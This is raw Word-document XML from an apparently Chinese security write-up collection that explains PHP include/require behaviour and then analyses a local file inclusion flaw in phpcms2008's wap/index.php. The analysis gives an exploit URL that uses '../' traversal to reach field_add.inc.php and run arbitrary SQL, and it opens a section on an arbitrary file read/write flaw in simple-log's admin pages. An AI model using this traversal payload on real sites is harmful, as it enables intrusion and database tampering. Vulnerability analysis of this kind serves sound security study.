    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="415" w:firstLine="420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w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>：包含并运行指定文件，当包含外部文件发生错误时，系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95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统给出警告，但整个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>文件继续执行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="472" w:firstLine="420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Require</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>：跟</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-39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唯一不同的是，当产生错误时候，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">include </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>下面继续运行而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> require</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-33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停止运行了。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ind w:left="417" w:right="451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</w:rPr>
        <w:t>Include_once</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>：这个函数跟</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> include</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-39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函数作用几乎相同，只是他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在导入函数之前先检测下该文件是否被导入。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>如果已经执行一遍那么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就不重复执行了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:jc w:val="both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after="23" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="phpcms2008本地文件包括及利用"/>
      <w:bookmarkStart w:id="34" w:name="_bookmark16"/>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Require_once</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>：这个函数跟</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> require </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>的区别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跟上面我所讲的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> include </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> include_once </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>是一样的。所以我就不重复了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417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5"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>phpcms2008</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>本地文件包括及利用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:b/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr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Jannock</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1" w:line="344" w:lineRule="exact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文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> wap/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="18"/>
        <w:ind w:right="2599"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>include</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> '../include/common.inc.php'; include '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>include/global.func.php';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$lang = include '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">include/lang.inc.php'; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>if(preg_match('/(mozilla|m3gate|winwap|openwave)/i',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="342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$_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>SERVER[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>'HTTP_USER_AGENT']))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>{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header(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>'location:../');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>}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wmlHeader(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>$PHPCMS['sitename']);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="509"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">$action = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>isset(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>$action) &amp;&amp; !empty($action) ? $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>action :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'index'; if($action)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="344" w:lineRule="exact"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>{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include</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> './include/'.$action.'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.inc.php';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>}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 xml:space="preserve">$html = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>CHARSET !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">= 'utf-8' ? </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>iconv(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>CHARSET, 'utf-8', $html) :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="361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$html;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="361" w:lineRule="exact"/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6"/>
        <w:spacing w:before="76"/>
        <w:ind w:right="3647"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="simple-log后台任意文件读写漏洞"/>
      <w:bookmarkStart w:id="36" w:name="_bookmark17"/>
      <w:bookmarkEnd w:id="35"/>
      <w:bookmarkEnd w:id="36"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>echo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> str_replace('', "\n", $html); wmlFooter();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="343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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6" w:line="680" w:lineRule="atLeast"/>
        <w:ind w:left="417" w:right="2342"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>action</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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变量没有判断，造成本地文件包含漏洞。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利用（其中之一）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="15" w:line="344" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="402"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包含目录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> include\fields\areaid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下任一文件，即可执行任意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本。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如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>field_add.inc.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="326" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
        <w:t>f(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
        <w:t>!$maxlength) $maxlength = 255;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 xml:space="preserve">$maxlength = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
        <w:t>min(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
        <w:t>$maxlength, 255);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$sql = "ALTER TABLE `$tablename` ADD `$field`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proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
        <w:t>VARCHAR(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
        <w:t xml:space="preserve"> $maxlength ) NOT NULL DEFAULT '$defaultvalue'";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$db-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
        <w:t>query(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
        <w:t>$sql);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="343" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="20" w:line="340" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tablename</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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等变量可以直接传入。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当然，这个访问需要用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Opera </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等浏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</w:rPr>
        <w:t>览器访问。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="62" w:line="237" w:lineRule="auto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用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Opera </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>浏览器访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>http://www.phpcms.cn/wap/index.php?action=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve">/../include/fields/a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>reaid/field_add&amp;tablename=xx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>simple-log</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后台任意文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:b/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="2342"/>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s9857" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:89.85pt;margin-top:53.9pt;width:319.25pt;height:97.8pt;z-index:328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($action=='get_page_data')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require(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PBBLOG_ROOT . '/includes/json.class.php');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="1584"/>
                    </w:tabs>
                    <w:spacing w:before="71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$json</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>= new</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda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JSON;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$file=$_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'template_file'];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$res=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array(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'type'=&gt;'get_page_data','content'=&gt;'','error'=&gt;'no');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  <w:sz w:val="24"/>
        </w:rPr>
        <w:t>作者：风眼哥</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/admin/includes/set_page.php </w:t>
      </w:r>
      <w:r>
        <w:t>中：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>产生读任意文件的地方：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:footerReference w:type="default" r:id="rId39"/>
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="1380" w:bottom="1160" w:left="1380" w:header="0" w:footer="978" w:gutter="0"/>
          <w:pgNumType w:start="7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856" type="#_x0000_t202" style="width:319.25pt;height:114.1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292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
